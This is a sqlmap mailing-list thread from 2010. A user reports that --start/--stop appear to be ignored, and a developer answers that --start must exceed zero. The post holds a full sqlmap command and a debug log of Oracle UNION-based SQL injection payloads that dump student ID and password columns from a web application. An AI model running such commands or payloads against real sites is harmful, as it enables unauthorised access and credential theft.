Re: [sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2010-04-26 08:59:57
|
you've provided --start 0, while it needs to be >0. we'll add the proper warning for this into runtime. kind regards. On Sat, Apr 24, 2010 at 4:02 AM, David Guimaraes <sk...@gm...> wrote: > Syntax that had problems: > > $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a > --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v > 2 > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:52:50 > > [22:52:50] [DEBUG] initializing the configuration > [22:52:50] [DEBUG] initializing the knowledge base > [22:52:50] [DEBUG] cleaning up configuration parameters > [22:52:50] [DEBUG] setting the HTTP timeout > [22:52:50] [DEBUG] setting the HTTP method to GET > [22:52:50] [DEBUG] creating HTTP requests opener object > [22:52:50] [DEBUG] parsing XML queries file > [22:52:50] [INFO] using '/path/session' as session file > [22:52:50] [INFO] resuming injection point 'GET' from session file > [22:52:50] [INFO] resuming injection parameter 'a' from session file > [22:52:50] [INFO] resuming injection type 'stringsingle' from session file > [22:52:50] [INFO] resuming 0 number of parenthesis from session file > [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file > [22:52:50] [INFO] resuming union comment '--' from session file > [22:52:50] [INFO] resuming union count 15 from session file > [22:52:50] [INFO] resuming union position 1 from session file > [22:52:50] [INFO] resuming union false condition 1 from session file > [22:52:50] [INFO] testing connection to the target url > [22:52:50] [DEBUG] got HTTP error code: 500 > [22:52:50] [WARNING] the testable parameter 'a' you provided is not into the > Cookie > [22:52:50] [INFO] testing for parenthesis on injectable parameter > [22:52:50] [DEBUG] skipping test for MySQL > [22:52:50] [INFO] the back-end DBMS is Oracle > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Oracle > > [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you > provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS' > as database name > [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table > 'ALU_ALUNOS' on database 'USERS' > [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will > now unpack it into distinct queries to be able to retrieve the output even > if we are in front of a partial inband sql injection > [22:52:50] [INFO] read from file '/path': 344305 > [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > ALU_ALUNOS-- AND 'RFOj'='RFOj > [22:52:51] [DEBUG] performed 1 queries in 0 seconds > [22:52:51] [INFO] the SQL query provided returns 344305 entries > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- > AND 'qGli'='qGli > [22:52:51] [DEBUG] performed 2 queries in 0 seconds > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2-- > AND 'EXyf'='EXyf > [22:52:53] [DEBUG] performed 3 queries in 1 seconds > [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3-- > AND 'CLyw'='CLyw > [22:52:56] [DEBUG] performed 4 queries in 2 seconds > [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4-- > AND 'nHQn'='nHQn > [22:52:57] [DEBUG] performed 5 queries in 0 seconds > [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5-- > AND 'iNmX'='iNmX > [22:52:58] [DEBUG] performed 6 queries in 1 seconds > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6-- > AND 'mVQM'='mVQM > [22:52:58] [DEBUG] performed 7 queries in 0 seconds > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7-- > AND 'FuqF'='FuqF > [22:52:59] [DEBUG] performed 8 queries in 0 seconds > [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8-- > AND 'utPd'='utPd > [22:53:01] [DEBUG] performed 9 queries in 2 seconds > [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9-- > AND 'ilBw'='ilBw > [22:53:03] [DEBUG] performed 10 queries in 2 seconds > [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS > VARCHAR(4000)), > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA > AS VARCHAR(4000)), > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10-- > AND 'YxAK'='YxAK > ^C > [22:53:04] [ERROR] user aborted > > [*] shutting down at: 22:53:04 > > > > As you can see, it will not stop consultation until the fourth, ignoring > parameters passed in ("--start" and "--stop"). > > I gave ctrl + c in the tenth query. > > Am I doing something wrong or is it anyway? > > $ svn info > Path: . > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap > Repository Root: https://svn.sqlmap.org/sqlmap > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb > Revision: 1588 > Node Kind: directory > Schedule: normal > Last Changed Author: inquisb > Last Changed Rev: 1588 > Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010) > > -- > David Gomes Guimarães > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |